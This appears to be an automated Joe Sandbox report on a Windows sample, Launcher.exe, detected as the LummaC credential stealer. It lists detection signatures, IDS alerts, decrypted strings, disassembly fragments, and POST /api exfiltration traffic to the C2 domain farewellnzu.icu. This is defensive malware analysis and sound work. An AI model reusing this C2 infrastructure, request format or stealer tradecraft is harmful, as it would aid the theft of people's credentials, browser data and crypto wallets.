Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Launcher.exe

Overview

General Information

Sample name:Launcher.exe
Analysis ID:1561497
MD5:3ca9ca734f501c8de4270556f80f0f60
SHA1:47652fb87960680ffe11dbc27a7969a2dacac97e
SHA256:cfe6d27ef692f436653789758b0713bf8c6e1ed6267bd22775ed482777db96e5
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Launcher.exe (PID: 2360 cmdline: "C:\Users\user\Desktop\Launcher.exe" MD5: 3CA9CA734F501C8DE4270556F80F0F60)
    • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Launcher.exe (PID: 5688 cmdline: "C:\Users\user\Desktop\Launcher.exe" MD5: 3CA9CA734F501C8DE4270556F80F0F60)
  • cleanup
{"C2 url": ["farewellnzu.icu"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.2215064071.00000000034F3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000003.2215064071.0000000003503000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Launcher.exe PID: 5688JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: Launcher.exe PID: 5688JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Launcher.exe PID: 5688JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:12:56.139869+010020283713Unknown Traffic192.168.2.649699172.67.198.61443TCP
              2024-11-23T15:12:58.155926+010020283713Unknown Traffic192.168.2.649700172.67.198.61443TCP
              2024-11-23T15:13:00.455993+010020283713Unknown Traffic192.168.2.649701172.67.198.61443TCP
              2024-11-23T15:13:02.633812+010020283713Unknown Traffic192.168.2.649702172.67.198.61443TCP
              2024-11-23T15:13:04.879612+010020283713Unknown Traffic192.168.2.649703172.67.198.61443TCP
              2024-11-23T15:13:07.273471+010020283713Unknown Traffic192.168.2.649705172.67.198.61443TCP
              2024-11-23T15:13:09.881039+010020283713Unknown Traffic192.168.2.649711172.67.198.61443TCP
              2024-11-23T15:13:13.548014+010020283713Unknown Traffic192.168.2.649724172.67.198.61443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:12:56.824663+010020546531A Network Trojan was detected192.168.2.649699172.67.198.61443TCP
              2024-11-23T15:12:58.873935+010020546531A Network Trojan was detected192.168.2.649700172.67.198.61443TCP
              2024-11-23T15:13:14.265345+010020546531A Network Trojan was detected192.168.2.649724172.67.198.61443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:12:56.824663+010020498361A Network Trojan was detected192.168.2.649699172.67.198.61443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:12:58.873935+010020498121A Network Trojan was detected192.168.2.649700172.67.198.61443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:13:07.978282+010020480941Malware Command and Control Activity Detected192.168.2.649705172.67.198.61443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://farewellnzu.icu/piAvira URL Cloud: Label: malware
              Source: 00000000.00000002.2102673577.0000000002AF2000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["farewellnzu.icu"]}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 82.5% probability
              Source: Launcher.exeJoe Sandbox ML: detected
              Source: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: farewellnzu.icu
              Source: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00418BE3 CryptUnprotectData,3_2_00418BE3
              Source: Launcher.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.61:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: Launcher.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0025174A FindFirstFileExW,0_2_0025174A
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_002517FB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_002517FB
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0025174A FindFirstFileExW,3_2_0025174A
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_002517FB FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_002517FB
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov edi, edx3_2_0043D880
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-43h]3_2_00420970
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi-000000BEh]3_2_0040A10E
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00418BE3
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edx+2EBA049Dh]3_2_0040CE5A
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_00440620
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov edi, esi3_2_00440740
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then lea eax, dword ptr [esp+3Ch]3_2_0040C7A5
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov ecx, ebx3_2_00439040
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0042C84A
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov edi, eax3_2_0042CD62
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00429F62
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 1B6183F2h3_2_00429813
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0042C8DC
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042D0F6
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004298A8
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]3_2_004298A8
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then add eax, edx3_2_00426959
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h3_2_00426910
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0042C918
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0042C929
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov bx, 0008h3_2_00404930
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then jmp ecx3_2_00404930
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_004231F0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then jmp dword ptr [00445ED4h]3_2_0040B989
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then cmp al, 5Ch3_2_00402190
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi-40D3E74Fh]3_2_0042A1A2
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000F0h]3_2_0040DA43
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov edx, ecx3_2_0040EA4F
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+6FB81553h]3_2_0041D201
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_0042BA10
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h3_2_00439290
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov ecx, edx3_2_00428A9C
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h3_2_00428A9C
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov edi, esi3_2_00425344
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004298A8
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]3_2_004298A8
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov byte ptr [edx], cl3_2_0042D318
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov edx, ebp3_2_004393D0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov byte ptr [edx], cl3_2_0042D380
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx edi, byte ptr [eax]3_2_0042E388
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00423450
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042B450
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041AC64
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov ebx, eax3_2_00405C20
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov ebp, eax3_2_00405C20
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov edx, eax3_2_00440CD0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004294BD
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov edi, eax3_2_0042CD67
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then jmp dword ptr [00447FC4h]3_2_00427580
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-59BD808Dh]3_2_00427580
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00427580
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov edx, ecx3_2_0042ADAB
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h3_2_0042ADAB
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov esi, ebx3_2_00408E00
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00435E10
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then jmp dword ptr [00445ED4h]3_2_0040B626
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-47412FB0h]3_2_0041CED0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041CED0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov ebx, edx3_2_0040BEB1
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+14h]3_2_00428F5D
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00429F62
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov ecx, eax3_2_00422776
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then jmp dword ptr [00447FC4h]3_2_00427774
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00427774
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax+7035CC0Ch]3_2_0041DF00
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 4x nop then mov esi, ecx3_2_00421F10

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49700 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49700 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49705 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49724 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49699 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49699 -> 172.67.198.61:443
              Source: Malware configuration extractorURLs: farewellnzu.icu
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49701 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49702 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49699 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49703 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49705 -> 172.67.198.61:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49700 -> 172.67.198.61:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: farewellnzu.icu
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: farewellnzu.icu
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KH182FAKYTKNBSET0JQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12872Host: farewellnzu.icu
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ODT8QICBOD0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15070Host: farewellnzu.icu
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I7NI61LWEADUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19928Host: farewellnzu.icu
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WP6G358XV8BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1183Host: farewellnzu.icu
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K093XR63GLCDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571912Host: farewellnzu.icu
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: farewellnzu.icu
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: farewellnzu.icu
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: farewellnzu.icu
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Launcher.exe, 00000003.00000003.2256165464.00000000034AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2279108045.00000000034EF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2237349522.00000000034AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2215064071.00000000034AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Launcher.exe, 00000003.00000003.2191621453.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Launcher.exe, 00000003.00000003.2192980116.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: Launcher.exe, 00000003.00000003.2215275401.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Launcher.exe, 00000003.00000003.2192980116.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: Launcher.exe, 00000003.00000003.2215275401.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Launcher.exe, 00000003.00000003.2148209010.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2148283560.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Launcher.exe, 00000003.00000003.2215048182.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2237349522.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu/
              Source: Launcher.exe, 00000003.00000003.2215064071.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu/R
              Source: Launcher.exe, 00000003.00000003.2279108045.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2215064071.0000000003503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu/api
              Source: Launcher.exe, 00000003.00000003.2216504961.000000000351C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2215064071.0000000003503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu/api(
              Source: Launcher.exe, 00000003.00000002.2302063024.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu/apibTr
              Source: Launcher.exe, 00000003.00000003.2216504961.000000000351C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2215064071.0000000003503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu/apiu
              Source: Launcher.exe, 00000003.00000002.2301370627.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu/d
              Source: Launcher.exe, 00000003.00000003.2237349522.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu/icjJY%
              Source: Launcher.exe, 00000003.00000003.2256165464.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2279108045.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu/pi
              Source: Launcher.exe, 00000003.00000003.2299733490.000000000348A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2301211251.000000000348A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu:443/api
              Source: Launcher.exe, 00000003.00000002.2301211251.000000000348A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://farewellnzu.icu:443/apical
              Source: Launcher.exe, 00000003.00000003.2215275401.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2192980116.0000000005A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: Launcher.exe, 00000003.00000003.2192632874.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
